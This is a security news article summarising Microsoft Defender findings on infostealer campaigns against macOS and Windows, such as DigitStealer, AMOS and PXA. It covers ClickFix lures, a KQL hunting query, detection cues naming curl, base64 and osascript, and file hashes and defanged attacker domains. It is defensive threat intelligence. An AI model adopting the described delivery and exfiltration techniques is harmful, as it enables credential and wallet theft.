macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services

Infostealer malware is spreading fast beyond Windows, now hitting macOS hard. Attackers use Python code and trusted apps to steal credentials quietly.

Since late 2025, Microsoft Defender Experts spotted macOS campaigns with fake sites, ClickFix tricks, and bad DMG files.

These drop stealers like DigitStealer, MacSync, and Atomic macOS Stealer (AMOS). The malware runs without files, taps macOS tools, and grabs browser data, keychains, and dev secrets via AppleScript.

Python stealers help attackers tweak code quickly for any OS. Others hijack WhatsApp and PDF tools to push malware like Eternidade Stealer, targeting bank logins and crypto wallets. Stolen info leads to account hacks, money loss, and business breaches.

macOS Tricks, Python Phishing, and App Abuse

Mac users face fake Google Ads and sites pushing bad downloads or Terminal commands. ClickFix scams make victims paste code that installs DigitStealer (via fake DynamicLake apps), MacSync (Terminal pastes), or AMOS (AI tool fakes).

All three snag browser passwords, crypto wallets, cloud keys, and dev tokens, then zip and send data to attacker servers before cleanup.

Python stealers like PXA surged in 2025, tied to Vietnamese actors hitting governments via phishing. They use Telegram for C2, obfuscated scripts, DLL sideloading, and fake svchost.exe processes.

Campaigns in October and December set persistence with Run keys or tasks, exfil data via Telegram.

Attackers abuse WhatsApp for worm-like spread. A November 2025 campaign starts with VBS dropping batch files and PowerShell.

It grabs contacts, sends bad messages, and drops Eternidade Stealer via MSI. This Delphi tool watches for bank sites like Bradesco, Binance, and MetaMask.

A September Crystal PDF scam used malvertising. The fake editor sets scheduled tasks, steals Chrome/Firefox cookies and sessions from AppData.

Mitigations, Detections, and IOCs

Block these with user training on fake installers and Terminal risks. Watch Terminal for curl, base64, gunzip, osascript. Flag Keychain access, ZIPs in /tmp, odd POSTs to new domains.

Use Microsoft Defender XDR: cloud protection, EDR block mode, network/web guards, SmartScreen, auto-remediation, tamper protection. Attack surface rules block obfuscated scripts, untrusted executables, JS/VBS downloads.

Defender spots execution (PowerShell curls, osascript), persistence (Run keys, LaunchAgents), evasion (DLL side-loading, certutil), credential grabs, discovery (WMI/Python), C2, collection (ZIPs), exfil (curl).

Hunt with queries like these for DigitStealer:

// Suspicious DMG mounting
DeviceProcessEvents
| where FileName has_any ('mount_hfs', 'mount')
| where ProcessCommandLine has_all ('-o nodev' , '-o quarantine')
| where ProcessCommandLine contains '/Volumes/Install DynamicLake'

Similar KQL for MacSync curls, AMOS mounts, PXA svchost.exe, WhatsApp VBS drops, CrystalPDF tasks.

Key IOCs (samples):

Indicator	Type	Description
3e20ddb90291ac17cef9913edd5ba91cd95437da86e396757c9d871a82b1282a	SHA-256	DigitStealer payload
42d51feea16eac568989ab73906bbfdd41641ee3752596393a875f85ecf06417	SHA-256	AMOS payload
2c885d1709e2ebfcaa81e998d199b29e982a7559b9d72e5db0e70bf31b183a5f	SHA-256	WhatsApp campaign
598da788600747cf3fa1f25cb4fa1e029eca1442316709c137690e645a0872bb	SHA-256	Crystal PDF payload
dynamiclake[.]org	Domain	DigitStealer delivery
barbermoo[.]coupons	Domain	MacSync C2
alli-ai[.]pro	Domain	AMOS redirect
bagumedios[.]cloud	Domain	PXA C2

Check Threat Analytics for MacSync and Crystal PDF intel. Organizations should scan now these cross-platform stealers blend in and evade old defenses.

Follow us on Google News , LinkedIn and X to Get More Instant Updates. Set Cyberpress as a Preferred Source in Google.

The post macOS Targeted as Infostealer Attacks Abuse Python and Trusted Services appeared first on Cyber Security News.